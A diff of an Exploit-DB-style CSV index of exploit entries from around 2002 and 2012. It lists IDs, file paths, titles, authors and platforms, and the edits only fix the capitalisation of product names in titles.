21307,platforms/windows/dos/21307.txt,"Rit Research Labs The Bat! 1.53 - Microsoft Denial of Service Device Name Denial of Service",2002-02-27,3APA3A,windows,dos,0 @@ -18600,7 +18601,7 @@ id,file,description,date,author,platform,type,port 21314,platforms/unix/remote/21314.txt,"OpenSSH 2.x/3.0.1/3.0.2 - Channel Code Off-by-One",2002-03-07,Morgan,unix,remote,0 21317,platforms/php/webapps/21317.txt,"NeoBill CMS 0.8 Alpha - Multiple Vulnerabilities",2012-09-14,Vulnerability-Lab,php,webapps,0 21318,platforms/windows/local/21318.pl,"Internet Download Manager - Stack Based Buffer Overflow",2012-09-14,Dark-Puzzle,windows,local,0 -21319,platforms/aix/webapps/21319.txt,"Trend Micro InterScan Messaging Security Suite - Persistent Cross-Site Scripting / Cross-Site Request Forgery",2012-09-14,modpr0be,aix,webapps,0 +21319,platforms/aix/webapps/21319.txt,"Trend Micro Interscan Messaging Security Suite - Persistent Cross-Site Scripting / Cross-Site Request Forgery",2012-09-14,modpr0be,aix,webapps,0 21320,platforms/windows/local/21320.pl,"Internet Download Manager - SEH Based Buffer Overflow",2012-09-14,Dark-Puzzle,windows,local,0 22073,platforms/php/webapps/22073.txt,"APBoard 2.0 2 - Unauthorized Thread Reading",2002-12-06,"DNA ESC",php,webapps,0 21323,platforms/linux/local/21323.c,"libdbus - 'DBUS_SYSTEM_BUS_ADDRESS' Privilege Escalation",2012-07-17,"Sebastian Krahmer",linux,local,0 @@ -18616,7 +18617,7 @@ id,file,description,date,author,platform,type,port 21336,platforms/windows/dos/21336.txt,"Xerver 2.10 - Multiple Request Denial of Service",2002-03-08,"Alex Hernandez",windows,dos,0 21337,platforms/multiple/dos/21337.c,"Menasoft SPHEREserver 0.99 - Denial of Service",2002-03-09,"H Zero Seven",multiple,dos,0 21338,platforms/linux/dos/21338.pl,"XTux Server 2001.0 6.01 - Garbage Denial of Service",2002-03-09,b0iler,linux,dos,0 -21339,platforms/multiple/remote/21339.c,"Trend Micro InterScan VirusWall 3.5/3.6 - Content-Length Scan Bypass",2002-03-11,"Jochen Thomas Bauer",multiple,remote,0 +21339,platforms/multiple/remote/21339.c,"Trend Micro Interscan VirusWall 3.5/3.6 - Content-Length Scan Bypass",2002-03-11,"Jochen Thomas Bauer",multiple,remote,0 21340,platforms/cgi/remote/21340.pl,"Solaris 7.0/8 Sunsolve CD - SSCD_SunCourier.pl CGI Script Arbitrary Command Execution",2002-03-11,Fyodor,cgi,remote,0 21341,platforms/linux/local/21341.c,"Ecartis 1.0.0/0.129 a Listar - Multiple Local Buffer Overflow Vulnerabilities (1)",2002-02-27,"the itch",linux,local,0 21342,platforms/linux/local/21342.c,"Ecartis 1.0.0/0.129 a Listar - Multiple Local Buffer Overflow Vulnerabilities (2)",2002-02-27,"the itch",linux,local,0 @@ -18624,12 +18625,12 @@ id,file,description,date,author,platform,type,port 21344,platforms/windows/local/21344.txt,"Microsoft Windows 2000 / NT 4.0 - Process Handle Local Privilege Elevation",2002-03-13,EliCZ,windows,local,0 21345,platforms/unix/dos/21345.txt,"Qualcomm QPopper 4.0.x - Remote Denial of Service",2002-03-15,"Jonas Frey",unix,dos,0 21346,platforms/windows/dos/21346.html,"Microsoft Internet Explorer 5/6 / Mozilla 0.8/0.9.x / Opera 5/6 - JavaScript Interpreter Denial of Service",2002-03-19,"Patrik Birgersson",windows,dos,0 -21347,platforms/php/local/21347.php,"PHP 3.0.x/4.x - Move_Uploaded_File Open_Basedir Circumvention",2002-03-17,Tozz,php,local,0 +21347,platforms/php/local/21347.php,"PHP 3.0.x/4.x - Move_Uploaded_File open_basedir Circumvention",2002-03-17,Tozz,php,local,0 21348,platforms/linux/local/21348.txt,"Webmin 0.x - Code Input Validation",2002-03-20,prophecy,linux,local,0 21349,platforms/php/webapps/21349.txt,"PHP-Nuke 5.x - Error Message Web Root Disclosure",2002-03-21,godminus,php,webapps,0 21350,platforms/windows/remote/21350.pl,"Apache Win32 1.3.x/2.0.x - Batch File Remote Command Execution",2002-03-21,SPAX,windows,remote,0 21351,platforms/windows/local/21351.pl,"WorkforceROI Xpede 4.1/7.0 - Weak Password Encryption",2002-03-22,c3rb3r,windows,local,0 -21352,platforms/cgi/webapps/21352.txt,"DCShop Beta 1.0 - Form Manipulation",2002-03-25,"pokleyzz sakamaniaka",cgi,webapps,0 +21352,platforms/cgi/webapps/21352.txt,"DCShop Beta 1.0 - Form manipulation",2002-03-25,"pokleyzz sakamaniaka",cgi,webapps,0 21353,platforms/linux/local/21353.c,"Linux Kernel 2.2.x / 2.3 / 2.4.x - d_path() Path Truncation (PoC)",2002-03-26,cliph,linux,local,0 21354,platforms/cgi/remote/21354.txt,"CSSearch 2.3 - Remote Command Execution",2002-03-26,"Steve Gustin",cgi,remote,0 21355,platforms/jsp/remote/21355.txt,"Citrix NFuse 1.51/1.6 - Cross-Site Scripting",2002-03-27,"Eric Detoisien",jsp,remote,0 @@ -18642,7 +18643,7 @@ id,file,description,date,author,platform,type,port 21362,platforms/linux/local/21362.c,"Oracle 8i - TNS Listener Local Command Parameter Buffer Overflow",2002-04-01,"the itch",linux,local,0 21363,platforms/unix/remote/21363.c,"Icecast 1.x - AVLLib Buffer Overflow",2002-02-16,dizznutt,unix,remote,0 21364,platforms/netbsd_x86/remote/21364.txt,"NetBSD 1.x TalkD - User Validation",2002-04-03,"Tekno pHReak",netbsd_x86,remote,0 -21365,platforms/linux/remote/21365.txt,"PHPGroupWare 0.9.13 - Debian Package Configuration",2002-04-03,"Matthias Jordan",linux,remote,0 +21365,platforms/linux/remote/21365.txt,"phpGroupWare 0.9.13 - Debian Package Configuration",2002-04-03,"Matthias Jordan",linux,remote,0 21366,platforms/windows/dos/21366.txt,"Microsoft Internet Explorer 5/6 / Outlook 2000/2002/5.5 / Word 2000/2002 - VBScript ActiveX Word Object Denial of Service",2002-04-08,"Elia Florio",windows,dos,0 21367,platforms/windows/remote/21367.txt,"Abyss Web Server 1.0 - File Disclosure",2002-04-07,"Jeremy Roberts",windows,remote,0 21368,platforms/windows/remote/21368.c,"Microsoft IIS 4.0/5.0 - Chunked Encoding Transfer Heap Overflow (1)",2002-04-10,"CHINANSL Security Team",windows,remote,0 @@ -18650,7 +18651,7 @@ id,file,description,date,author,platform,type,port 21370,platforms/windows/remote/21370.c,"Microsoft IIS 4.0/5.0 - Chunked Encoding Transfer Heap Overflow (3)",2002-04-10,NeMeS||y,windows,remote,0 21371,platforms/windows/remote/21371.c,"Microsoft IIS 4.0/5.0 - Chunked Encoding Transfer Heap Overflow (4)",2002-04-24,yuange,windows,remote,0 21419,platforms/windows/dos/21419.txt,"Microsoft Outlook Express 5.5 - Denial of Service Device Denial of Service",2002-04-24,ERRor,windows,dos,0 -21372,platforms/windows/remote/21372.txt,"Microsoft IIS 4/5 - HTTP Error Page Cross-Site Scripting",2002-04-10,"Thor Larholm",windows,remote,0 +21372,platforms/windows/remote/21372.txt,"Microsoft IIS 4.0/5.0 - HTTP Error Page Cross-Site Scripting",2002-04-10,"Thor Larholm",windows,remote,0 21373,platforms/openbsd/local/21373.c,"OpenBSD 2.9/3.0 - Default Crontab Root Compromise",2002-04-11,"Przemyslaw Frasunek",openbsd,local,0 21374,platforms/cgi/webapps/21374.txt,"IBM Informix Web Datablade 4.1x - Page Request SQL Injection",2002-04-11,"Simon Lodal",cgi,webapps,0 21375,platforms/linux/local/21375.txt,"ISC INN 2.0/2.1/2.2.x - Multiple Local Format String Vulnerabilities",2002-04-11,"Paul Starzetz",linux,local,0 @@ -18658,8 +18659,8 @@ id,file,description,date,author,platform,type,port 21377,platforms/php/webapps/21377.txt,"SunShop Shopping Cart 1.5/2.x - User-Embedded Scripting",2002-04-13,ppp-design,php,webapps,0 21378,platforms/hardware/remote/21378.txt,"Nortel CVX 1800 Multi-Service Access Switch - Default SNMP Community",2002-04-15,"Michael Rawls",hardware,remote,0 21379,platforms/multiple/dos/21379.pl,"Melange Chat System 2.0.2 Beta 2 - /yell Remote Buffer Overflow",2002-04-14,DVDMAN,multiple,dos,0 -21380,platforms/php/webapps/21380.php,"Burning Board 1.1.1 - URL Parameter Manipulation",2002-04-15,SeazoN,php,webapps,0 -21381,platforms/php/webapps/21381.txt,"XGB GuestBook 1.2 - User-Embedded Scripting",2002-04-15,Firehack,php,webapps,0 +21380,platforms/php/webapps/21380.php,"Burning Board 1.1.1 - URL Parameter manipulation",2002-04-15,SeazoN,php,webapps,0 +21381,platforms/php/webapps/21381.txt,"XGB Guestbook 1.2 - User-Embedded Scripting",2002-04-15,Firehack,php,webapps,0 21382,platforms/php/webapps/21382.txt,"XGB 1.2 - Remote Form Field Input Validation",2002-04-14,Firehack,php,webapps,0 21383,platforms/php/webapps/21383.txt,"xNewsletter 1.0 - Form Field Input Validation",2002-04-14,Firehack,php,webapps,0 21384,platforms/multiple/remote/21384.txt,"Demarc PureSecure 1.0.5 - Authentication Check SQL Injection",2002-04-15,"pokleyzz sakamaniaka",multiple,remote,0 @@ -18669,9 +18670,9 @@ id,file,description,date,author,platform,type,port 21388,platforms/windows/dos/21388.c,"Microsoft Windows 2000 - Lanman Denial of Service (1)",2002-04-17,"Daniel Nystrom",windows,dos,0 21389,platforms/windows/dos/21389.txt,"Microsoft Windows 2000 - Lanman Denial of Service (2)",2003-01-03,ch0wn,windows,dos,0 21390,platforms/cgi/remote/21390.txt,"Sambar Server 5.1 - Script Source Disclosure",2002-04-17,pgrundl,cgi,remote,0 -21391,platforms/php/webapps/21391.txt,"PVote 1.0/1.5 - Poll Content Manipulation",2002-04-18,"Daniel Nyström",php,webapps,0 -21392,platforms/windows/webapps/21392.txt,"Spiceworks 6.0.00993 - Multiple Script Injection Vulnerabilities",2012-09-19,LiquidWorm,windows,webapps,0 -21393,platforms/php/webapps/21393.txt,"Wordpress Plugin wp-topbar 4.02 - Multiple Vulnerabilities",2012-09-19,"Blake Entrekin",php,webapps,0 +21391,platforms/php/webapps/21391.txt,"PVote 1.0/1.5 - Poll Content manipulation",2002-04-18,"Daniel Nyström",php,webapps,0 +21392,platforms/windows/webapps/21392.txt,"SpiceWorks 6.0.00993 - Multiple Script Injection Vulnerabilities",2012-09-19,LiquidWorm,windows,webapps,0 +21393,platforms/php/webapps/21393.txt,"WordPress Plugin wp-topbar 4.02 - Multiple Vulnerabilities",2012-09-19,"Blake Entrekin",php,webapps,0 21394,platforms/windows/webapps/21394.txt,"SonicWALL email security 7.3.5 - Multiple Vulnerabilities",2012-09-19,Vulnerability-Lab,windows,webapps,0 21395,platforms/hardware/webapps/21395.txt,"Fortigate UTM WAF Appliance - Multiple Vulnerabilities",2012-09-19,Vulnerability-Lab,hardware,webapps,0 21396,platforms/php/webapps/21396.txt,"torrenttrader 2.08 - Multiple Vulnerabilities",2012-09-19,waraxe,php,webapps,0 @@ -18684,8 +18685,8 @@ id,file,description,date,author,platform,type,port 21403,platforms/php/webapps/21403.txt,"PostBoard 2.0 - Topic Title Script Execution",2002-04-19,gcsb,php,webapps,0 21404,platforms/windows/dos/21404.htm,"Microsoft Internet Explorer 5/6 - Self-Referential Object Denial of Service",2002-04-20,"Matthew Murphy",windows,dos,0 21405,platforms/cgi/webapps/21405.txt,"Jon Howell Faq-O-Matic 2.7 - Cross-Site Scripting",2002-04-20,BrainRawt,cgi,webapps,0 -21406,platforms/cgi/webapps/21406.txt,"Philip Chinery's GuestBook 1.1 - Script Injection",2002-04-21,"markus arndt",cgi,webapps,0 -21407,platforms/bsd/local/21407.c,"OS X 10.x / FreeBSD 4.x / OpenBSD 2.x / Solaris 2.5/2.6/7.0/8 - exec C Library Standard I/O File Descriptor Closure",2002-04-23,phased,bsd,local,0 +21406,platforms/cgi/webapps/21406.txt,"Philip Chinery's Guestbook 1.1 - Script Injection",2002-04-21,"markus arndt",cgi,webapps,0 +21407,platforms/bsd/local/21407.c,"Apple Mac OS X 10.x / FreeBSD 4.x / OpenBSD 2.x / Solaris 2.5/2.6/7.0/8 - exec C Library Standard I/O File Descriptor Closure",2002-04-23,phased,bsd,local,0 21408,platforms/unix/local/21408.pl,"SLRNPull 0.9.6 - Spool Directory Command Line Parameter Buffer Overflow",2002-04-22,zillion,unix,local,0 21409,platforms/unix/dos/21409.pl,"PsyBNC 2.3 - Oversized Passwords Denial of Service",2002-04-22,DVDMAN,unix,dos,0 21410,platforms/windows/remote/21410.pl,"Matu FTP 1.74 - Client Buffer Overflow",2002-04-23,Kanatoko,windows,remote,0 @@ -18693,7 +18694,7 @@ id,file,description,date,author,platform,type,port 21412,platforms/unix/remote/21412.txt,"Apache Tomcat 4.0/4.1 - Servlet Full Path Disclosure",2002-04-23,"CHINANSL Security Team",unix,remote,0 21413,platforms/multiple/dos/21413.txt,"National Instruments LabVIEW 5.1.1/6.0/6.1 - HTTP Request Denial of Service",2002-04-19,"Steve Zins",multiple,dos,0 21414,platforms/unix/local/21414.c,"GNU Screen 3.9.x - Braille Module Buffer Overflow",2002-04-23,"Gobbles Security",unix,local,0 -21415,platforms/cgi/remote/21415.txt,"CGIScript.NET - csMailto Hidden Form Field Remote Command Execution",2002-04-23,"Steve Gustin",cgi,remote,0 +21415,platforms/cgi/remote/21415.txt,"CGIScript.net - csMailto Hidden Form Field Remote Command Execution",2002-04-23,"Steve Gustin",cgi,remote,0 21416,platforms/windows/dos/21416.txt,"Microsoft Internet Explorer 5/6 - Recursive JavaScript Event Denial of Service",2002-04-24,"Berend-Jan Wever",windows,dos,0 21417,platforms/hardware/webapps/21417.py,"Thomson Wireless VoIP Cable Modem - Authentication Bypass",2012-09-20,"Glafkos Charalambous ",hardware,webapps,0 21418,platforms/php/webapps/21418.txt,"Manhali 1.8 - Local File Inclusion",2012-09-20,L0n3ly-H34rT,php,webapps,0 @@ -18701,7 +18702,7 @@ id,file,description,date,author,platform,type,port 21421,platforms/php/webapps/21421.txt,"PHProjekt 2.x/3.x - Login Bypass",2002-04-25,"Ulf Harnhammar",php,webapps,0 21422,platforms/linux/remote/21422.txt,"ACME Labs thttpd 2.20 - Cross-Site Scripting",2002-04-25,frog,linux,remote,0 21423,platforms/php/webapps/21423.txt,"Ultimate PHP Board 1.0/1.1 - Image Tag Script Injection",2002-04-25,frog,php,webapps,0 -21424,platforms/php/webapps/21424.txt,"Admanager 1.1 - Content Manipulation",2002-04-17,frog,php,webapps,0 +21424,platforms/php/webapps/21424.txt,"ADManager 1.1 - Content manipulation",2002-04-17,frog,php,webapps,0 21425,platforms/php/webapps/21425.txt,"DNSTools 2.0 - Authentication Bypass",2002-04-28,ppp-design,php,webapps,0 21426,platforms/php/webapps/21426.txt,"Blahz-DNS 0.2 - Direct Script Call Authentication Bypass",2002-04-28,ppp-design,php,webapps,0 21427,platforms/php/webapps/21427.txt,"MiniBB 1.2 - Cross-Site Scripting",2002-04-17,frog,php,webapps,0 @@ -18711,7 +18712,7 @@ id,file,description,date,author,platform,type,port 21431,platforms/irix/dos/21431.txt,"IRIX 6.5.x - Performance Co-Pilot Remote Denial of Service",2002-04-12,"Marcelo Magnasco",irix,dos,0 21432,platforms/windows/dos/21432.txt,"BEA Systems WebLogic Server and Express 7.0 - Null Character Denial of Service",2002-04-30,"Peter Gründl",windows,dos,0 21433,platforms/cgi/webapps/21433.txt,"MyGuestbook 1.0 - Script Injection",2002-04-30,BrainRawt,cgi,webapps,0 -21434,platforms/asp/webapps/21434.txt,"Outfront Spooky 2.x - Login SQL Query Manipulation Password",2002-05-02,anonymous,asp,webapps,0 +21434,platforms/asp/webapps/21434.txt,"Outfront Spooky 2.x - Login SQL Query manipulation Password",2002-05-02,anonymous,asp,webapps,0 21435,platforms/cgi/webapps/21435.txt,"askSam 4.0 Web Publisher - Cross-Site Scripting",2002-05-05,frog,cgi,webapps,0 21436,platforms/php/webapps/21436.txt,"B2 0.6 - b2edit.showposts.php b2inc Parameter Remote File Inclusion",2002-05-06,Frank,php,webapps,0 21437,platforms/solaris/remote/21437.c,"Solaris 2/7/8/9 cachefsd - Heap Overflow",2002-01-01,"Last Stage of Delirium",solaris,remote,0 @@ -18735,7 +18736,7 @@ id,file,description,date,author,platform,type,port 21455,platforms/asp/webapps/21455.txt,"Hosting Controller 1.x - DSNManager Directory Traversal",2002-05-17,hdlkha,asp,webapps,0 21456,platforms/hardware/remote/21456.txt,"Cisco IDS Device Manager 3.1.1 - Arbitrary File Read Access",2002-05-17,"Andrew Lopacki",hardware,remote,0 21457,platforms/asp/webapps/21457.txt,"Hosting Controller 1.4 - Import Root Directory Command Execution",2002-05-17,hdlkha,asp,webapps,0 -21458,platforms/linux/local/21458.txt,"(Linux Kernel) grsecurity Kernel Patch 1.9.4 - Memory Protection",2002-05-17,"Guillaume PELAT",linux,local,0 +21458,platforms/linux/local/21458.txt,"(Linux Kernel) Grsecurity Kernel Patch 1.9.4 - Memory Protection",2002-05-17,"Guillaume PELAT",linux,local,0 21459,platforms/php/webapps/21459.txt,"Phorum 3.3.2a - Remote Command Execution",2002-05-17,"markus arndt",php,webapps,0 21460,platforms/cgi/webapps/21460.pl,"CGIScript.net 1.0 - Information Disclosure",2002-05-17,"Steve Gustin",cgi,webapps,0 21461,platforms/php/webapps/21461.txt,"Phorum 3.3.2 - Cross-Site Scripting",2002-05-18,"markus arndt",php,webapps,0 @@ -18743,8 +18744,8 @@ id,file,description,date,author,platform,type,port 21463,platforms/php/webapps/21463.txt,"mcNews 1.x - File Disclosure",2002-05-17,frog,php,webapps,0 21464,platforms/asp/webapps/21464.txt,"Hosting Controller 1.x - Browse.asp File Disclosure",2002-05-19,"Bao Dai Nhan",asp,webapps,0 21465,platforms/hardware/dos/21465.txt,"Cisco IOS 11.x/12.0 - ICMP Redirect Denial of Service",2002-05-21,FX,hardware,dos,0 -21466,platforms/windows/remote/21466.c,"YoungZSoft 3.30/4.0 CMailServer - Buffer Overflow (1)",2002-05-20,anonymous,windows,remote,0 -21467,platforms/windows/remote/21467.c,"YoungZSoft 3.30/4.0 CMailServer - Buffer Overflow (2)",2002-05-21,Over_G,windows,remote,0 +21466,platforms/windows/remote/21466.c,"Youngzsoft 3.30/4.0 CMailServer - Buffer Overflow (1)",2002-05-20,anonymous,windows,remote,0 +21467,platforms/windows/remote/21467.c,"Youngzsoft 3.30/4.0 CMailServer - Buffer Overflow (2)",2002-05-21,Over_G,windows,remote,0 21468,platforms/windows/remote/21468.pl,"Matu FTP Server 1.13 - Buffer Overflow",2002-05-22,Kanatoko,windows,remote,0 21469,platforms/windows/remote/21469.txt,"NewAtlanta ServletExec/ISAPI 4.1 - Full Path Disclosure",2002-05-22,"Matt Moore",windows,remote,0 21470,platforms/windows/remote/21470.txt,"NewAtlanta ServletExec/ISAPI 4.1 - File Disclosure",2002-05-22,"Matt Moore",windows,remote,0 @@ -18789,7 +18790,7 @@ id,file,description,date,author,platform,type,port 21508,platforms/windows/dos/21508.py,"SafeNet Sentinel Keys Server - Crash (PoC)",2012-09-24,retset,windows,dos,0 21509,platforms/php/webapps/21509.txt,"Teekai Tracking Online 1.0 - Cross-Site Scripting",2002-06-03,frog,php,webapps,0 21510,platforms/windows/remote/21510.pl,"Microsoft Internet Explorer 5/6 / Microsoft ISA Server 2000 / Microsoft Proxy Server 2.0 Gopher Client - Buffer Overflow",2002-07-27,mat@monkey.org,windows,remote,0 -21511,platforms/multiple/remote/21511.c,"Nullsoft SHOUTCast 1.8.9 - Remote Buffer Overflow",2002-06-04,eSDee,multiple,remote,0 +21511,platforms/multiple/remote/21511.c,"Nullsoft SHOUTcast 1.8.9 - Remote Buffer Overflow",2002-06-04,eSDee,multiple,remote,0 21512,platforms/freebsd/dos/21512.txt,"Slurp 1.10 - SysLog Remote Format String",2002-06-04,zillion,freebsd,dos,0 21513,platforms/hardware/remote/21513.c,"Telindus 1100 Series Router - Administration Password Leak",2002-06-05,rubik,hardware,remote,0 21514,platforms/php/webapps/21514.txt,"Splatt Forum 3.0 - Image Tag HTML Injection",2002-06-06,MegaHz,php,webapps,0 @@ -18822,10 +18823,10 @@ id,file,description,date,author,platform,type,port 21543,platforms/java/webapps/21543.txt,"Ruslan Communications Builder - SQL Injection",2002-06-13,"Alexander Korchagin",java,webapps,0 21544,platforms/multiple/dos/21544.html,"Netscape 4.77 - Composer Font Face Field Buffer Overflow",2002-06-13,S[h]iff,multiple,dos,0 21545,platforms/jsp/webapps/21545.txt,"JAMF Casper Suite MDM - Cross-Site Request Forgery",2012-09-27,"Jacob Holcomb",jsp,webapps,0 -21546,platforms/windows/webapps/21546.py,"Trend Micro Control Manager 5.5/6.0 AdHocQuery - Post-Authenticated Blind SQL Injection",2012-09-27,otoy,windows,webapps,0 +21546,platforms/windows/webapps/21546.py,"Trend Micro Control Manager 5.5/6.0 AdHocQuery - Post-Authentication Blind SQL Injection",2012-09-27,otoy,windows,webapps,0 21547,platforms/windows/local/21547.txt,"Smartfren Connex EC 1261-2 UI OUC - Privilege Escalation",2012-09-27,X-Cisadane,windows,local,0 21548,platforms/cfm/remote/21548.txt,"ColdFusion MX - Missing Template Cross-Site Scripting",2002-06-13,Macromedia,cfm,remote,0 -21549,platforms/windows/local/21549.txt,"Microsoft SQL Server 2000 - Password Encrypt Procedure Buffer Overflow",2002-06-14,"Martin Rakhmanoff",windows,local,0 +21549,platforms/windows/local/21549.txt,"Microsoft SQL Server 2000 - Password Encrypt procedure Buffer Overflow",2002-06-14,"Martin Rakhmanoff",windows,local,0 21550,platforms/windows/local/21550.txt,"Lumigent Log Explorer XP - _LogAttach_StartProf Buffer Overflow",2002-06-14,"Martin Rakhmanoff",windows,local,0 21551,platforms/windows/local/21551.txt,"Lumigent Log Explorer 3.0.1 - XP_LogAttach_SetPort Buffer Overflow",2002-06-14,"Martin Rakhmanoff",windows,local,0 21552,platforms/php/webapps/21552.txt,"PHP Classifieds 6.0.5 - Cross-Site Scripting",2002-06-14,windows-1256,php,webapps,0 @@ -18833,7 +18834,7 @@ id,file,description,date,author,platform,type,port 21554,platforms/windows/remote/21554.txt,"Imatix Xitami 2.5 - GSL Template Cross-Site Scripting",2002-06-14,"Matthew Murphy",windows,remote,0 21555,platforms/windows/remote/21555.txt,"Cisco Secure ACS for Windows NT 3.0 - Cross-Site Scripting",2002-06-14,"Dave Palumbo",windows,remote,0 21556,platforms/windows/dos/21556.txt,"Microsoft Internet Explorer 5/6 - CSSText Bold Font Denial of Service",2002-06-15,"Oleg A. Cheremisin",windows,dos,0 -21557,platforms/php/webapps/21557.txt,"Zeroboard 4.1 - PHP Include File Arbitrary Command Execution",2002-06-15,onlooker,php,webapps,0 +21557,platforms/php/webapps/21557.txt,"ZeroBoard 4.1 - PHP Include File Arbitrary Command Execution",2002-06-15,onlooker,php,webapps,0 21558,platforms/cgi/webapps/21558.txt,"My Postcards 6.0 - MagicCard.cgi Arbitrary File Disclosure",2002-06-15,cult,cgi,webapps,0 21559,platforms/multiple/remote/21559.c,"Apache 1.x/2.0.x - Chunked-Encoding Memory Corruption (1)",2002-06-17,"Gobbles Security",multiple,remote,0 21560,platforms/multiple/remote/21560.c,"Apache 1.x/2.0.x - Chunked-Encoding Memory Corruption (2)",2002-06-17,"Gobbles Security",multiple,remote,0 @@ -18864,7 +18865,7 @@ id,file,description,date,author,platform,type,port 21585,platforms/linux/local/21585.c,"Mandrake 7/8/9 / RedHat 6.x/7 Bonobo EFSTool - Commandline Argument Buffer Overflow (3)",2002-06-29,N4rK07IX,linux,local,0 21586,platforms/linux/remote/21586.txt,"E-Guest 1.1 - Server Side Include Arbitrary Command Execution",2002-06-30,DownBload,linux,remote,0 21587,platforms/cgi/webapps/21587.txt,"BBC Education Betsie 1.5 - Parserl.pl Cross-Site Scripting",2002-07-01,"Mark Rowe",cgi,webapps,0 -21588,platforms/cgi/webapps/21588.txt,"Blackboard 5.0 - Cross-Site Scripting",2002-07-01,"Berend-Jan Wever",cgi,webapps,0 +21588,platforms/cgi/webapps/21588.txt,"BlackBoard 5.0 - Cross-Site Scripting",2002-07-01,"Berend-Jan Wever",cgi,webapps,0 21589,platforms/windows/remote/21589.pl,"AnalogX Proxy 4.0 - Socks4A Buffer Overflow",2002-07-01,Kanatoko,windows,remote,0 21590,platforms/php/webapps/21590.txt,"phpAuction 1/2 - Unauthorized Administrative Access",2002-07-02,ethx,php,webapps,0 21591,platforms/windows/remote/21591.sh,"ArGoSoft 1.8 Mail Server - Directory Traversal",2002-07-06,"team n.finity",windows,remote,0 @@ -18872,13 +18873,13 @@ id,file,description,date,author,platform,type,port 21593,platforms/multiple/dos/21593.txt,"Epic Games Unreal Tournament Server 436.0 - Denial of Service Amplifier",2002-07-03,"Auriemma Luigi",multiple,dos,0 21594,platforms/windows/dos/21594.pl,"WorldSpan Res Manager 4.1 - Malformed TCP Packet Denial of Service",2002-07-04,altomo,windows,dos,0 21595,platforms/windows/remote/21595.c,"Nullsoft Winamp 2.80 - Automatic Update Check Buffer Overflow",2002-07-03,anonymous,windows,remote,0 -21596,platforms/osx/remote/21596.txt,"Mac OSX 10.1.x - SoftwareUpdate Arbitrary Package Installation",2002-07-08,"Russell Harding",osx,remote,0 +21596,platforms/osx/remote/21596.txt,"Apple Mac OS X 10.1.x - SoftwareUpdate Arbitrary Package Installation",2002-07-08,"Russell Harding",osx,remote,0 21597,platforms/windows/remote/21597.txt,"Key Focus KF Web Server 1.0.2 - Directory Contents Disclosure",2002-07-08,Securiteinfo.com,windows,remote,0 21598,platforms/linux/dos/21598.c,"Linux Kernel 2.4.18/19 - Privileged File Descriptor Resource Exhaustion",2002-07-08,"Paul Starzetz",linux,dos,0 21599,platforms/windows/remote/21599.txt,"Working Resources BadBlue 1.7.3 - cleanSearchString() Cross-Site Scripting",2002-07-08,"Matthew Murphy",windows,remote,0 21600,platforms/windows/dos/21600.txt,"Working Resources BadBlue 1.7.3 - Get Request Denial of Service",2002-07-08,"Matthew Murphy",windows,dos,0 21601,platforms/windows/remote/21601.c,"Microsoft Foundation Class Library 7.0 - ISAPI Buffer Overflow",2002-07-08,"Matthew Murphy",windows,remote,0 -21602,platforms/linux/remote/21602.txt,"icecast server 1.3.12 - Directory Traversal information disclosure",2002-07-09,glaive,linux,remote,0 +21602,platforms/linux/remote/21602.txt,"icecast server 1.3.12 - Directory Traversal Information Disclosure",2002-07-09,glaive,linux,remote,0 21603,platforms/multiple/remote/21603.txt,"iPlanet Web Server 4.1 - Search Component File Disclosure",2002-07-09,"Qualys Corporation",multiple,remote,0 21604,platforms/linux/remote/21604.txt,"Apache Tomcat 4.0.3 - Servlet Mapping Cross-Site Scripting",2002-07-10,"Matt Moore",linux,remote,0 21605,platforms/windows/remote/21605.txt,"Apache Tomcat 4.0.3 - Denial of Service Device Name / Cross-Site Scripting",2002-07-10,"Matt Moore",windows,remote,0 @@ -18889,7 +18890,7 @@ id,file,description,date,author,platform,type,port 21610,platforms/php/webapps/21610.txt,"Sun i-Runbook 2.5.2 - Directory And File Content Disclosure",2002-07-11,JWC,php,webapps,0 21611,platforms/windows/remote/21611.txt,"Summit Computer Networks Lil' HTTP Server 2.1/2.2 - pbcgi.cgi Cross-Site Scripting",2002-07-11,"Matthew Murphy",windows,remote,0 21612,platforms/windows/dos/21612.txt,"Ultrafunk Popcorn 1.20 - Multiple Denial of Service Vulnerabilities",2002-07-11,"Auriemma Luigi",windows,dos,0 -21613,platforms/windows/remote/21613.txt,"Microsoft IIS 4/5 - SMTP Service Encapsulated SMTP Address",2002-07-12,JWC,windows,remote,0 +21613,platforms/windows/remote/21613.txt,"Microsoft IIS 4.0/5.0 - SMTP Service Encapsulated SMTP Address",2002-07-12,JWC,windows,remote,0 21614,platforms/freebsd/remote/21614.c,"ATPhttpd 0.4b - Buffer Overflow",2002-07-12,badc0ded,freebsd,remote,0 21615,platforms/windows/remote/21615.c,"Real Networks RealJukebox 1.0.2/RealOne 6.0.10 Player Gold - Skinfile Buffer Overflow",2002-07-12,UNYUN,windows,remote,0 21616,platforms/windows/remote/21616.txt,"Working Resources 1.7.3 BadBlue - Null Byte File Disclosure",2002-06-13,"Matthew Murphy",windows,remote,0 @@ -18901,8 +18902,8 @@ id,file,description,date,author,platform,type,port 21622,platforms/php/webapps/21622.txt,"PHP-Wiki 1.2/1.3 - Cross-Site Scripting",2002-07-17,Pistone,php,webapps,0 21623,platforms/linux/local/21623.txt,"Python 1.5.2 Pickle - Unsafe eval() Code Execution",2002-07-17,"Jeff Epler",linux,local,0 21624,platforms/linux/local/21624.py,"Python 1.5/1.6/2.0/2.1.x - Pickle Class Constructor Arbitrary Code Execution",2002-07-17,"Jeff Epler",linux,local,0 -21625,platforms/windows/remote/21625.pl,"Trend Micro InterScan VirusWall for Windows NT 3.52 - Space Gap Scan Bypass",2002-07-18,SecuriTeam,windows,remote,0 -21626,platforms/windows/remote/21626.c,"3.3/4.0/4.2 MERCUR Mailserver - Control-Service Buffer Overflow",2002-07-16,anonymous,windows,remote,0 +21625,platforms/windows/remote/21625.pl,"Trend Micro Interscan VirusWall for Windows NT 3.52 - Space Gap Scan Bypass",2002-07-18,SecuriTeam,windows,remote,0 +21626,platforms/windows/remote/21626.c,"3.3/4.0/4.2 MERCUR MailServer - Control-Service Buffer Overflow",2002-07-16,anonymous,windows,remote,0 22072,platforms/linux/remote/22072.c,"Cobalt RaQ4 - Administrative Interface Command Execution",2002-12-05,grazer,linux,remote,0 21627,platforms/multiple/remote/21627.txt,"Oracle Reports Server 6.0.8/9.0.2 - Information Disclosure",2002-07-18,skp,multiple,remote,0 21628,platforms/php/webapps/21628.txt,"Geeklog 1.3.5 - HTML Attribute Cross-Site Scripting",2002-07-19,"Ulf Harnhammar",php,webapps,0 @@ -18923,9 +18924,9 @@ id,file,description,date,author,platform,type,port 21643,platforms/windows/remote/21643.c,"CodeBlue 5.1 - SMTP Response Buffer 